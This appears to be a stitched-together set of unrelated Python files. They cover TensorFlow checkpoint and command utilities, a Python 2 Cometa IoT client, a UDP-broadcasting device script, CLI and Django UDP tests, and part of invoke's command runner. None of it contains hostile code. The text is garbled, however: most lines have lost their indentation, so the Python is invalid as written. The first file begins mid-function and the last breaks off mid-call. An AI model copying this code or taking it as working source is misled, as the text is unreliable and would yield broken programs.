vs = var_list or tf.trainable_variables()
with h5py.File(ckpt, "r") as f:
for variables in tqdm.tqdm(list(split_by_params(vs))):
values = [truncate_value(x, f[variable_name(x)], reshape=reshape) for x in variables]
assign_values(variables, values, session=session)
def maketree(path):
try:
os.makedirs(path)
except:
pass
state.cache_ops = {}
def cast_variables(variables, graph=None, cache_ops=None):
if graph is None:
graph = get_default_graph()
if cache_ops is None:
cache_ops = state.cache_ops
if graph not in cache_ops:
cache_ops[graph] = {}
cache = cache_ops[graph]
ops = []
for variable in variables:
if variable in cache:
op = cache[variable]
elif variable.dtype == dtypes.bfloat16_ref or variable.dtype == tf.bfloat16:
op = tf.cast(variable, tf.float32)
else:
op = variable
cache[variable] = op
ops.append(op)
return ops
import re
def variable_name(variable):
if re.match(r'core[0-9]+/', variable.name):
return variable.name.split('/', 1)[-1]
return variable.name
def save_variables(ckpt, session=None, var_list=None):
session = session or get_default_session()
vs = var_list or tf.trainable_variables()
maketree(os.path.dirname(ckpt))
fname = ckpt+'.tmp'
with h5py.File(fname, "w") as f:
for variables in tqdm.tqdm(list(split_by_params(vs))):
ops = cast_variables(variables)
values = session.run(ops)
for value, variable in zip(values, variables):
name = variable_name(variable)
shape = variable.shape.as_list()
dtype = variable.dtype
dset = f.create_dataset(name, shape, dtype=np.float32)
dset[:] = value
print('Writing snapshot %s' % ckpt)
os.rename(ckpt+'.tmp', ckpt)
def fetch_variables(session=None, var_list=None):
session = session or get_default_session()
vs = var_list or tf.trainable_variables()
for variables in tqdm.tqdm(list(split_by_params(vs))):
values = session.run(variables)
yield variables, values
def partition_variables(session=None, var_list=None):
session = session or get_default_session()
vs = var_list or tf.trainable_variables()
for variables in tqdm.tqdm(list(split_by_params(vs))):
yield variables
class Saver(object):
def __init__(
self,
var_list=None,
reshape=False,
sharded=False,
max_to_keep=5,
keep_checkpoint_every_n_hours=10000.0,
name=None,
restore_sequentially=False,
saver_def=None,
builder=None,
defer_build=False,
allow_empty=False,
write_version=tf.train.SaverDef.V2,
pad_step_number=False,
save_relative_paths=False,
filename=None):
self.var_list = var_list
self.reshape = reshape
self.sharded = sharded
self.max_to_keep = max_to_keep
self.keep_checkpoint_every_n_hours = keep_checkpoint_every_n_hours
self.name = name
self.restore_sequentially = restore_sequentially
self.saver_def = saver_def
self.builder = builder
self.defer_build = defer_build
self.allow_empty = allow_empty
self.write_version = write_version
self.pad_step_number = pad_step_number
self.save_relative_paths = save_relative_paths
self.filename = filename
self.checkpoints = []
def restore(self, sess, save_path):
if save_path.endswith('.ckpt'):
load_snapshot(save_path, session=sess, var_list=self.var_list, reshape=self.reshape)
elif save_path.endswith('.hdf5'):
load_variables(save_path, session=sess, var_list=self.var_list, reshape=self.reshape)
elif os.path.exists(save_path + '.npy') or os.path.exists(save_path + '-0.npy'):
load_weights(save_path, session=sess, var_list=self.var_list, reshape=self.reshape)
elif os.path.exists(save_path + '.hdf5'):
load_variables(save_path + '.hdf5', session=sess, var_list=self.var_list, reshape=self.reshape)
else:
raise Exception("Can't load checkpoint %s" % save_path)
def save(self,
sess,
save_path,
global_step=None,
latest_filename=None,
meta_graph_suffix="meta",
write_meta_graph=True,
write_state=True,
strip_default_attrs=False,
save_debug_info=False):
if global_step is not None:
name = '%s-%d.hdf5' % (save_path, global_step)
else:
name = '%s.hdf5' % save_path
save_variables(name, session=sess, var_list=self.var_list)
self.checkpoints.append(name)
if self.max_to_keep > 0:
while len(self.checkpoints) > self.max_to_keep:
fname = self.checkpoints[0]
if fname != name:
print('Truncating %s' % fname)
try:
with open(fname, "wb") as f:
pass
except:
print('Failed to truncate %s' % fname)
self.checkpoints = self.checkpoints[1:]
def fetch(self, sess, var_list=None):
if var_list == None:
var_list = self.var_list
for variables, values in fetch_variables(session=sess, var_list=var_list):
yield variables, values
def variables(self, sess, var_list=None):
if var_list == None:
var_list = self.var_list
for variables in partition_variables(session=sess, var_list=var_list):
yield variables
def assign(self, sess, variables, values):
return assign_values(variables, values, session=sess)
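# Usage sketch (mirrors the tf.train.Saver interface, but snapshots are written
# as .hdf5 files; paths below are hypothetical):
#
#   saver = Saver(var_list=tf.trainable_variables(), max_to_keep=3)
#   saver.save(sess, 'checkpoint/model', global_step=1000)  # -> checkpoint/model-1000.hdf5
#   saver.restore(sess, 'checkpoint/model-1000.hdf5')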
class Commands(object):
def __init__(self, path='commands'):
self.path = path
self.commands = []
self.args = []
self.keys = {}
self.frozen = False
def has(self, name, **keys):
if 'action' in keys:
action = keys.pop('action')
for name1, action1 in self.commands:
if name == name1 and action1 == action:
return True
else:
for name1, action1 in self.commands:
if name == name1:
return True
return False
def add(self, name, action=None):
if not self.has(name=name, action=action):
self.commands.append((name, action))
full = self.full_path(name)
maketree(full)
def full_path(self, name):
return os.path.join(self.path, name)
def check(self, *args, **keys):
if not self.frozen:
heartbeat()
ops = []
seen = set()
for name, action in self.commands:
full = self.full_path(name)
if not os.path.isdir(full):
if name not in seen:
seen.add(name)
ops.append(name)
for op in ops:
self.run(op, *args, **keys)
return ops
def run(self, op):
ran = False
for name, action in self.commands:
if name == op:
print('Running command', name, action)
if not ran:
full = self.full_path(op)
maketree(full)
ran = True
if action:
action()
if not ran:
raise Exception('Commands.execute failed: no such command: {}'.format(op))
def run_with_args(self, op, *args, **keys):
with CommandArgs(*args, **keys):
return self.run(op)
commander = None
def commands(**keys):
global commander
if commander is None:
commander = Commands()
cmds = keys.pop('commands') if 'commands' in keys else None
if cmds is not None:
for cmd in cmds:
action = None
if isinstance(cmd, str):
name = cmd
elif len(cmd) >= 2:
name, action = cmd
elif len(cmd) >= 1:
name = cmd[0]
else:
continue
commander.add(name=name, action=action)
return commander
class CommandArgs(object):
def __init__(self, *args, **keys):
self.args = list(args)
self.keys = keys.copy()
self.cmdr = commands()
def __enter__(self):
self.args_prev = self.cmdr.args
self.keys_prev = self.cmdr.keys
self.cmdr.args = self.args
self.cmdr.keys = self.keys
def __exit__(self, *excinfo):
self.cmdr.args = self.args_prev
self.cmdr.keys = self.keys_prev
def check_commands():
try:
cmdr = commands()
return cmdr.check()
except:
traceback.print_exc()
def check_commands_with_args(*args, **keys):
try:
cmdr = commands()
with CommandArgs(*args, **keys):
return cmdr.check()
except:
traceback.print_exc()
def add_command(name, action=None, **keys):
cmdr = commands()
return cmdr.add(name=name, action=action)
def register_command(*args, **keys):
fn = args[0]
if isinstance(fn, str):
add_command(fn)
else:
name = fn.__qualname__
name = name.replace('.<locals>.', '_command_')
if name.endswith('_command_save'):
name = 'save'
name = name.replace('___', '/')
action = fn
print(name, action)
add_command(name, action)
return fn
def has_command(name):
cmdr = commands()
return cmdr.has(name)
def run_command(command_name):
cmdr = commands()
return cmdr.run(command_name)
def run_command_with_args(command_name, *args, **keys):
cmdr = commands()
return cmdr.run_with_args(command_name, *args, **keys)
def command_arg(x, unset=None):
cmdr = commands()
if isinstance(x, int):
try:
return cmdr.args[x]
except:
return unset
else:
if x in cmdr.keys:
return cmdr.keys[x]
return unset
def command_args():
cmdr = commands()
return cmdr.args, cmdr.keys
@register_command
def attach_debugger():
import pdb
pdb.set_trace()
from pprint import pprint
@register_command
def print_status():
args, props = command_args()
for k, v in enumerate(args):
pprint(v)
for k, v in props.items():
pprint({k: v})
#
# return current UTC timestamp.
#
def utc():
from datetime import datetime
d = datetime.utcnow()
import calendar
return calendar.timegm(d.utctimetuple())
def heartbeat():
pongfile=os.environ['PONG'] if 'PONG' in os.environ else 'pong.txt'
with open(pongfile, "a+") as f:
nonce = os.urandom(8).hex()
now=utc()
out="pid{}_time{}_nonce{}\n".format(os.getpid(), now, nonce)
#print("PONG! Writing {} to {}".format(out, pongfile))
f.write(out)
f.flush()
import time
@register_command
def freeze_forever():
cmdr = commands()
if cmdr.frozen:
print("Already frozen.")
return
    prev = cmdr.frozen
    cmdr.frozen = True
    print('Simulating a freeze; going into an infinite loop:')
    start = time.time()
    try:
        while not should_quit():
            elapsed = time.time() - start
            print('Frozen for {}s'.format(elapsed))
            time.sleep(1)
            check_commands()
    finally:
        cmdr.frozen = prev
_quit = False
import sys
@register_command
def quit():
global _quit
if _quit:
print("Failed to quit; running sys.exit(1)")
sys.exit(1)
else:
print("Quitting...")
_quit = True
def should_quit():
return _quit
@register_command
def save_and_quit():
global _quit
if has_command('save'):
print("Saving...")
run_command('save')
quit()
@register_command
def throw_exception():
raise Exception("This exception should be caught and logged by the tflex command system")
import tensorflow as tf
from contextlib import contextmanager
@contextmanager
def nullcontext(enter_result=None):
yield enter_result
def set_override_device(value, session=None):
session = get_session(session)
session._override_device = value
return value
def has_override_device(session=None):
session = get_session(session)
return hasattr(session, '_override_device')
def get_override_device(session=None):
session = get_session(session)
if hasattr(session, '_override_device'):
return session._override_device
def set_override_cores(value, session=None):
session = get_session(session)
session._override_cores = value
return value
def has_override_cores(session=None):
session = get_session(session)
return hasattr(session, '_override_cores')
def get_override_cores(session=None):
session = get_session(session)
if hasattr(session, '_override_cores'):
return session._override_cores
def device_for_tpu_core(task=0, core=0, job_name="tpu_worker"):
return "/job:%s/task:%d/device:TPU_REPLICATED_CORE:%d" % (job_name, task, core)
def device(name=''):
if has_override_device():
return nullcontext()
if has_override_cores():
if name is None:
return tf.device(name)
if name.startswith('/gpu:'):
i = int(name.split(':', 1)[-1])
return tf.device(get_cores()[i].name)
if name.startswith('/tpu:'):
i = int(name.split(':', 1)[-1])
return tf.device(device_for_tpu_core(core=i))
if name.startswith('/cpu:'):
i = int(name.split(':', 1)[-1])
return tf.device(get_cpus()[i].name)
return nullcontext()
if name is None:
return tf.device(None)
if 'gpu' in name:
if has_gpu():
return tf.device(name)
if 'cpu' in name:
return tf.device(name)
return nullcontext()
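# Usage sketch: device() degrades gracefully, returning a null context when the
# requested device kind is unavailable in the default session (build_model and
# inputs below are placeholders):
#
#   with device('/gpu:0'):   # tf.device('/gpu:0') if a GPU exists, else a no-op
#       logits = build_model(inputs)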
|
cometalib.py
|
"""
Author: Emile Camus
"""
__license__ = """
Copyright 2015 Visible Energy Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__all__ = ["CometaClient"]
import socket
import select
import time
import threading
import ssl
# From http-parser (0.8.3)
# pip install http-parser
from http_parser.parser import HttpParser
import pdb
class CometaClient(object):
"""Connect a device to the Cometa infrastructure"""
errors = {0:'ok', 1:'timeout', 2:'network error', 3:'protocol error', 4:'authorization error', 5:'wrong parameters', 9:'internal error'}
def __init__(self,server, port, application_id, use_ssl):
"""
The Cometa instance constructor.
server: the Cometa server FQDN
port: the Cometa server port
application_id: the Cometa application ID
"""
self.error = 9
self.debug = False
self._server = server
self._port = port
self._app_id = application_id
self._use_ssl = use_ssl
self._message_cb = None
self._device_id = ""
self._platform = ""
self._hparser = None
self._sock = None #socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._heartbeat_rate = 60
self._trecv = None
self._thbeat = None
self._hb_lock = threading.Lock()
self._reconnecting = False
return
def attach(self, device_id, device_info):
"""
Attach the specified device to a Cometa registered application.
Authentication is done using only the application_id (one-way authentication).
device_id: the device unique identifier
device_info: a description of the platform or the device (used only as a comment)
"""
self._device_id = device_id
self._platform = device_info
self._hparser = HttpParser()
tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self._use_ssl:
self._sock = ssl.wrap_socket(tsock, ssl_version=ssl.PROTOCOL_SSLv23, ciphers="AES256-GCM-SHA384")
else:
self._sock = tsock
try:
self._sock.connect((self._server, self._port))
sendBuf="POST /v1/applications/%s/devices/%s HTTP/1.1\r\nHost: api.cometa.io\r\nContent-Length:%d\r\n\r\n%s" % (self._app_id,device_id,len(device_info),device_info)
self._sock.send(sendBuf)
recvBuf = ""
while True:
data = self._sock.recv(1024)
if not data:
break
dataLen = len(data)
nparsed = self._hparser.execute(data, dataLen)
assert nparsed == dataLen
if self._hparser.is_headers_complete():
if self.debug:
print "connection for device %s headers received" % (device_id)
print self._hparser.get_headers()
if self._hparser.is_partial_body():
recvBuf = self._hparser.recv_body()
if self.debug:
print "connection for device %s body received" % (device_id)
print recvBuf
#TODO: check for error in connecting, i.e. 403 already connected
# reading the attach complete message from the server
# i.e. {"msg":"200 OK","heartbeat":60,"timestamp":1441382935}
if len(recvBuf) < 16 or recvBuf[1:12] != '"msg":"200"':
self.error = 5
print "Error in string from server; %s" % recvBuf
return recvBuf
# reset error
self.error = 0
# set the socket non blocking
self._sock.setblocking(0)
# do not (re)start the threads during a reconnection
if self._reconnecting:
self._reconnecting = False
return recvBuf
if self.debug:
print "connection for device %s completed" % (device_id)
            # start the heartbeat thread
self._thbeat = threading.Thread(target=self._heartbeat)
self._thbeat.daemon = True
self._thbeat.start()
# start the receive thread
#time.sleep(2)
self._trecv = threading.Thread(target=self._receive)
self._trecv.daemon = True # force to exit on SIGINT
self._trecv.start()
return recvBuf
except Exception, e:
print e
self.error = 2
return
def send_data(self, msg):
"""
Send a data event message upstream to the Cometa server.
If a Webhook is specified for the Application in the Cometa configuration file /etc/cometa.conf on the server,
the message is relayed to the Webhook. Also, the Cometa server propagates the message to all open devices Websockets.
"""
sendBuf = "%x\r\n%c%s\r\n" % (len(msg) + 1,'\07',msg)
if self._reconnecting:
if self.debug:
print "Error in Cometa.send_data(): device is reconnecting."
return -1
try:
self._hb_lock.acquire()
self._sock.send(sendBuf)
self._hb_lock.release()
except Exception, e:
if self.debug:
print "Error in Cometa.send_data(): socket write failed."
return -1
return 0
def bind_cb(self, message_cb):
"""
Binds the specified user callback to the Cometa instance.
"""
self._message_cb = message_cb
return
def perror(self):
"""
Return a string for the current error.
"""
return CometaClient.errors[self.error]
def _heartbeat(self):
"""
The heartbeat thread.
        The heartbeat message is a chunk of length 3 with the MSG_HEARTBEAT byte and closed with CRLF.
This thread detects a server disconnection and attempts to reconnect to the Cometa server.
"""
if self.debug:
print "Hearbeat thread started.\r"
while True:
time.sleep(self._heartbeat_rate)
if self._reconnecting:
print "--- heartbeat while reconnecting"
continue
sendBuf = "1\r\n%c\r\n" % '\06'
print "sending heartbeat"
try:
self._hb_lock.acquire()
self._sock.send(sendBuf)
self._hb_lock.release()
except Exception, e:
print "--- error sending heartbeat"
return
def _receive(self):
"""
The receive and user callback dispatch loop thread.
"""
if self.debug:
print "Receive thread started.\r"
while True:
ready_to_read, ready_to_write, in_error = select.select([self._sock.fileno()],[],[self._sock.fileno()], 15)
# check for timeout
if not (ready_to_read or ready_to_write or in_error):
continue
for i in in_error:
# handle errors as disconnections and try to reconnect to the server
print "Network error in receive loop (error). Reconnecting..."
self._sock.close()
# self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._reconnecting = True
ret = self.attach(self._device_id, self._platform)
if self.error != 0:
print "Error in attaching to Cometa.", self.perror()
time.sleep(15)
continue
else:
print "Device attached to Cometa.", ret
continue
for i in ready_to_read:
                try:
                    data = self._sock.recv(1024)
                except Exception, e:
                    print e
                    data = None
if not data:
# handle errors as disconnections and try to reconnect to the server
print "Network error in receive loop (no data). Reconnecting..."
try:
self._sock.close()
except Exception, e:
print "--- exception in close socket."
pass
# self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._reconnecting = True
ret = self.attach(self._device_id, self._platform)
if self.error != 0:
print "Error in attaching to Cometa.", self.perror()
time.sleep(15)
continue
else:
print "Device attached to Cometa.", ret
continue
if self.debug:
print "** received: %s (%d)" % (data, len(data))
self._hparser.execute(data, len(data))
if self._hparser.is_partial_body():
to_send = self._hparser.recv_body()
# pdb.set_trace()
# the payload contains a HTTP chunk
if self._message_cb:
# invoke the user callback
reply = self._message_cb(to_send, len(to_send))
else:
reply = ""
if self.debug:
print "After callback."
else:
continue
if self.debug:
print "Returning result."
sendBuf = "%x\r\n%s\r\n" % (len(reply),reply)
try:
self._hb_lock.acquire()
self._sock.send(sendBuf)
self._hb_lock.release()
except Exception, e:
print "--- error sending reply"
pass
msg = ""
|
test_cli.py
|
import json
import os
import signal
import threading
import time
import heal
OK_OUTPUT = """
watching: {0}, {1}
tests directory has changed
reading configuration
validating tests
exiting: loop-ending signal
""".lstrip()
def test_ok(tmp_path, capsys):
tests_directory = tmp_path.joinpath("conf")
tests_directory.mkdir()
mode_file = tmp_path.joinpath("mode-file")
status_file = tmp_path.joinpath("status.json")
def delayed_kill():
time.sleep(0.5)
os.kill(os.getpid(), signal.SIGINT)
threading.Thread(target=delayed_kill).start()
heal.main(["-t", str(tests_directory), "-m", str(mode_file), "-s", str(status_file), "-d", "0.2"])
assert capsys.readouterr().out == OK_OUTPUT.format(tests_directory, mode_file)
assert json.loads(status_file.read_text(encoding="utf-8")).get("status") == "ok"
|
cool-device.py
|
import json
import socket
import threading
from time import sleep
# The wildcard import below is expected to provide SERIAL_NUMBER, waitForConnection
# and the shared connection state used throughout this script.
from connection import *
import connection
from datetime import datetime
state = 0
def getIncomingCommands():
global state
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", 5006))
while True:
if connection.CONNECTED:
data, addr = sock.recvfrom(1024)
print(data)
try:
jsonParsed = json.loads(data)
SN = jsonParsed['SN']
if SN == connection.SERIAL_NUMBER:
state = jsonParsed['state']
except Exception as e:
pass
else:
sleep(1)
def sendData():
global i
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
if connection.CONNECTED:
sock.sendto(
bytes(
"{\"SN\": \"" + SERIAL_NUMBER + "\",\"nickname\":\"" +
connection.NICKNAME +
"\",\"action\": \"COOL\",\"power\":" +
str(connection.POWER) + ", \"value\":" + str(state) + "}",
"utf-8"), ("255.255.255.255", 5005))
print("{\"SN\": \"" + SERIAL_NUMBER + "\",\"nickname\":\"" +
connection.NICKNAME + "\",\"action\": \"COOL\",\"power\":" +
str(connection.POWER) + ", \"value\":" + str(state) + "}")
print("state=" + str(state))
sleep(5)
checkConnection = threading.Thread(target=waitForConnection)
sender = threading.Thread(target=sendData)
getCommands = threading.Thread(target=getIncomingCommands)
checkConnection.start()
sender.start()
getCommands.start()
while True:
sleep(1)
|
test_udp_protocol.py
|
from django.test import TestCase
from data_reader.models import ModbusRTU, UdpProtocol, BrokenTransductorException, TransportProtocol
from transductor.models import EnergyTransductor, TransductorModel
import threading
import mock
import socket
import SocketServer
class UDPHandler(SocketServer.BaseRequestHandler):
"""
This class works similar to the TCP handler class, except that
self.request consists of a pair of data and client socket, and since
there is no connection the client address must be given explicitly
when sending data back via sendto().
"""
def handle(self):
data = self.request[0].strip()
socket = self.request[1]
if data == 'Request 1':
response = 'Response 1'
socket.sendto(response, self.client_address)
elif data == 'Request 2':
response = 'Response 2'
socket.sendto(response, self.client_address)
else:
pass
class UDPProtocolTest(TestCase):
def setUp(self):
HOST, PORT = "localhost", 9999
# Creating Transductor Model and Energy Transductor
t_model = TransductorModel()
t_model.name = "TR 4020"
t_model.transport_protocol = "UDP"
t_model.serial_protocol = "Modbus RTU"
t_model.register_addresses = [[4, 0], [68, 1]]
t_model.save()
transductor = EnergyTransductor()
transductor.serie_number = "1"
transductor.description = "Test"
transductor.model = t_model
transductor.ip_address = HOST
transductor.save()
# Setting instance attributes
self.t_model = t_model
self.transductor = transductor
self.modbus_rtu = ModbusRTU(self.transductor)
self.udp_protocol = UdpProtocol(serial_protocol=self.modbus_rtu, timeout=0.5, port=9999)
# Starting UDP server via thread
self.server = SocketServer.UDPServer((HOST, PORT), UDPHandler)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.start()
def tearDown(self):
self.server.shutdown()
self.server.server_close()
def test_create_socket(self):
self.assertEqual(socket.AF_INET, self.udp_protocol.socket.family)
self.assertEqual(socket.SOCK_DGRAM, self.udp_protocol.socket.type)
self.assertEqual(0.5, self.udp_protocol.socket.gettimeout())
def test_reset_receive_attempts(self):
self.udp_protocol.receive_attempts += 1
self.assertEqual(1, self.udp_protocol.receive_attempts)
self.udp_protocol.reset_receive_attempts()
self.assertEqual(0, self.udp_protocol.receive_attempts)
def test_receive_message_via_socket_udp(self):
messages_to_send = [
'Request 1',
'Request 2'
]
messages = self.udp_protocol.handle_messages_via_socket(messages_to_send)
response = [
'Response 1',
'Response 2'
]
self.assertEqual(response, messages)
def test_udp_socket_timeout(self):
wrong_ip_address = '0.0.0.0'
self.transductor.ip_address = wrong_ip_address
test_modbus_rtu = ModbusRTU(self.transductor)
test_udp_protocol = UdpProtocol(serial_protocol=test_modbus_rtu, timeout=0.5)
messages_to_send = [
'Request 1',
'Request 2'
]
messages = test_udp_protocol.handle_messages_via_socket(messages_to_send)
self.assertIsNone(messages)
@mock.patch.object(ModbusRTU, 'create_messages', return_value='any created messages', autospec=True)
@mock.patch.object(UdpProtocol, 'handle_messages_via_socket', return_value=None, autospec=True)
def test_start_communication_with_transductor_not_broken_and_socket_timeout(self, mock_udp_method, mock_modbus_method):
with self.assertRaises(BrokenTransductorException):
self.udp_protocol.start_communication()
self.assertEqual(self.udp_protocol.receive_attempts, self.udp_protocol.max_receive_attempts)
@mock.patch.object(ModbusRTU, 'create_messages', return_value='any created messages', autospec=True)
@mock.patch.object(UdpProtocol, 'handle_messages_via_socket', return_value='any return', autospec=True)
def test_start_communication_working_properly(self, mock_udp_method, mock_modbus_method):
self.assertEqual('any return', self.udp_protocol.start_communication())
self.assertEqual(0, self.udp_protocol.receive_attempts)
def test_start_communication_abstract_method(self):
self.assertEqual(None, TransportProtocol.start_communication(self.udp_protocol))
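# Illustrative note (assumes a standard Django project layout; the app/module path is
# inferred from the imports above): these tests are intended for Django's test runner, e.g.
#     python manage.py test data_reader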
|
runners.py
|
# -*- coding: utf-8 -*-
import locale
import os
import struct
from subprocess import Popen, PIPE
import sys
import threading
import time
import signal
from .util import six
# Import some platform-specific things at top level so they can be mocked for
# tests.
try:
import pty
except ImportError:
pty = None
try:
import fcntl
except ImportError:
fcntl = None
try:
import termios
except ImportError:
termios = None
from .exceptions import (
UnexpectedExit,
Failure,
ThreadException,
WatcherError,
SubprocessPipeError,
CommandTimedOut,
)
from .terminals import (
WINDOWS,
pty_size,
character_buffered,
ready_for_reading,
bytes_to_read,
)
from .util import has_fileno, isatty, ExceptionHandlingThread, encode_output
class Runner(object):
"""
Partially-abstract core command-running API.
This class is not usable by itself and must be subclassed, implementing a
number of methods such as `start`, `wait` and `returncode`. For a subclass
implementation example, see the source code for `.Local`.
.. versionadded:: 1.0
"""
read_chunk_size = 1000
input_sleep = 0.01
def __init__(self, context):
"""
Create a new runner with a handle on some `.Context`.
:param context:
a `.Context` instance, used to transmit default options and provide
access to other contextualized information (e.g. a remote-oriented
`.Runner` might want a `.Context` subclass holding info about
hostnames and ports.)
.. note::
The `.Context` given to `.Runner` instances **must** contain
default config values for the `.Runner` class in question. At a
minimum, this means values for each of the default
`.Runner.run` keyword arguments such as ``echo`` and ``warn``.
:raises exceptions.ValueError:
if not all expected default values are found in ``context``.
"""
#: The `.Context` given to the same-named argument of `__init__`.
self.context = context
#: A `threading.Event` signaling program completion.
#:
#: Typically set after `wait` returns. Some IO mechanisms rely on this
#: to know when to exit an infinite read loop.
self.program_finished = threading.Event()
# I wish Sphinx would organize all class/instance attrs in the same
# place. If I don't do this here, it goes 'class vars -> __init__
# docstring -> instance vars' :( TODO: consider just merging class and
# __init__ docstrings, though that's annoying too.
#: How many bytes (at maximum) to read per iteration of stream reads.
self.read_chunk_size = self.__class__.read_chunk_size
# Ditto re: declaring this in 2 places for doc reasons.
#: How many seconds to sleep on each iteration of the stdin read loop
#: and other otherwise-fast loops.
self.input_sleep = self.__class__.input_sleep
#: Whether pty fallback warning has been emitted.
self.warned_about_pty_fallback = False
#: A list of `.StreamWatcher` instances for use by `respond`. Is filled
#: in at runtime by `run`.
self.watchers = []
self._timer = None
def run(self, command, **kwargs):
"""
Execute ``command``, returning an instance of `Result`.
.. note::
All kwargs will default to the values found in this instance's
`~.Runner.context` attribute, specifically in its configuration's
``run`` subtree (e.g. ``run.echo`` provides the default value for
the ``echo`` keyword, etc). The base default values are described
in the parameter list below.
:param str command: The shell command to execute.
:param str shell:
Which shell binary to use. Default: ``/bin/bash`` (on Unix;
``COMSPEC`` or ``cmd.exe`` on Windows.)
:param bool warn:
Whether to warn and continue, instead of raising
`.UnexpectedExit`, when the executed command exits with a
nonzero status. Default: ``False``.
.. note::
This setting has no effect on exceptions, which will still be
raised, typically bundled in `.ThreadException` objects if they
were raised by the IO worker threads.
Similarly, `.WatcherError` exceptions raised by
`.StreamWatcher` instances will also ignore this setting, and
will usually be bundled inside `.Failure` objects (in order to
preserve the execution context).
Ditto `.CommandTimedOut` - basically, anything that prevents a
command from actually getting to "exited with an exit code"
ignores this flag.
:param hide:
Allows the caller to disable ``run``'s default behavior of copying
the subprocess' stdout and stderr to the controlling terminal.
Specify ``hide='out'`` (or ``'stdout'``) to hide only the stdout
stream, ``hide='err'`` (or ``'stderr'``) to hide only stderr, or
``hide='both'`` (or ``True``) to hide both streams.
The default value is ``None``, meaning to print everything;
``False`` will also disable hiding.
.. note::
Stdout and stderr are always captured and stored in the
``Result`` object, regardless of ``hide``'s value.
.. note::
``hide=True`` will also override ``echo=True`` if both are
given (either as kwargs or via config/CLI).
:param bool pty:
By default, ``run`` connects directly to the invoked process and
reads its stdout/stderr streams. Some programs will buffer (or even
behave) differently in this situation compared to using an actual
terminal or pseudoterminal (pty). To use a pty instead of the
default behavior, specify ``pty=True``.
.. warning::
Due to their nature, ptys have a single output stream, so the
ability to tell stdout apart from stderr is **not possible**
when ``pty=True``. As such, all output will appear on
``out_stream`` (see below) and be captured into the ``stdout``
result attribute. ``err_stream`` and ``stderr`` will always be
empty when ``pty=True``.
:param bool fallback:
Controls auto-fallback behavior re: problems offering a pty when
``pty=True``. Whether this has any effect depends on the specific
`Runner` subclass being invoked. Default: ``True``.
:param bool echo:
Controls whether `.run` prints the command string to local stdout
prior to executing it. Default: ``False``.
.. note::
``hide=True`` will override ``echo=True`` if both are given.
:param dict env:
By default, subprocesses receive a copy of Invoke's own environment
(i.e. ``os.environ``). Supply a dict here to update that child
environment.
For example, ``run('command', env={'PYTHONPATH':
'/some/virtual/env/maybe'})`` would modify the ``PYTHONPATH`` env
var, with the rest of the child's env looking identical to the
parent.
.. seealso:: ``replace_env`` for changing 'update' to 'replace'.
:param bool replace_env:
When ``True``, causes the subprocess to receive the dictionary
given to ``env`` as its entire shell environment, instead of
updating a copy of ``os.environ`` (which is the default behavior).
Default: ``False``.
:param str encoding:
Override auto-detection of which encoding the subprocess is using
for its stdout/stderr streams (which defaults to the return value
of `default_encoding`).
:param out_stream:
A file-like stream object to which the subprocess' standard output
should be written. If ``None`` (the default), ``sys.stdout`` will
be used.
:param err_stream:
Same as ``out_stream``, except for standard error, and defaulting
to ``sys.stderr``.
:param in_stream:
            A file-like stream object to be used as the subprocess' standard
input. If ``None`` (the default), ``sys.stdin`` will be used.
If ``False``, will disable stdin mirroring entirely (though other
functionality which writes to the subprocess' stdin, such as
autoresponding, will still function.) Disabling stdin mirroring can
help when ``sys.stdin`` is a misbehaving non-stream object, such as
under test harnesses or headless command runners.
:param watchers:
A list of `.StreamWatcher` instances which will be used to scan the
program's ``stdout`` or ``stderr`` and may write into its ``stdin``
(typically ``str`` or ``bytes`` objects depending on Python
version) in response to patterns or other heuristics.
See :doc:`/concepts/watchers` for details on this functionality.
Default: ``[]``.
:param bool echo_stdin:
Whether to write data from ``in_stream`` back to ``out_stream``.
In other words, in normal interactive usage, this parameter
controls whether Invoke mirrors what you type back to your
terminal.
By default (when ``None``), this behavior is triggered by the
following:
* Not using a pty to run the subcommand (i.e. ``pty=False``),
as ptys natively echo stdin to stdout on their own;
* And when the controlling terminal of Invoke itself (as per
``in_stream``) appears to be a valid terminal device or TTY.
(Specifically, when `~invoke.util.isatty` yields a ``True``
result when given ``in_stream``.)
.. note::
This property tends to be ``False`` when piping another
program's output into an Invoke session, or when running
Invoke within another program (e.g. running Invoke from
itself).
If both of those properties are true, echoing will occur; if either
is false, no echoing will be performed.
When not ``None``, this parameter will override that auto-detection
and force, or disable, echoing.
:param timeout:
Cause the runner to submit an interrupt to the subprocess and raise
`CommandTimedOut`, if the command takes longer than ``timeout``
seconds to execute. Defaults to ``None``, meaning no timeout.
.. versionadded:: 1.3
:returns:
`Result`, or a subclass thereof.
:raises:
`.UnexpectedExit`, if the command exited nonzero and
``warn`` was ``False``.
:raises:
`.Failure`, if the command didn't even exit cleanly, e.g. if a
`.StreamWatcher` raised `.WatcherError`.
:raises:
`.ThreadException` (if the background I/O threads encountered
exceptions other than `.WatcherError`).
.. versionadded:: 1.0
"""
try:
return self._run_body(command, **kwargs)
finally:
self.stop()
self.stop_timer()
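    # Illustrative usage sketch (assumes a concrete subclass such as `Local` below and
    # a properly configured `Context`; names are otherwise hypothetical):
    #     result = Local(context).run("ls -l", hide=True, warn=True)
    #     print(result.ok, result.exited)
    #     print(result.stdout)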
def _run_body(self, command, **kwargs):
# Normalize kwargs w/ config
opts, out_stream, err_stream, in_stream = self._run_opts(kwargs)
shell = opts["shell"]
# Environment setup
env = self.generate_env(opts["env"], opts["replace_env"])
# Echo running command
if opts["echo"]:
print("\033[1;37m{}\033[0m".format(command))
# If dry-run, stop here.
if opts["dry"]:
return self.generate_result(
command=command,
stdout="",
stderr="",
exited=0,
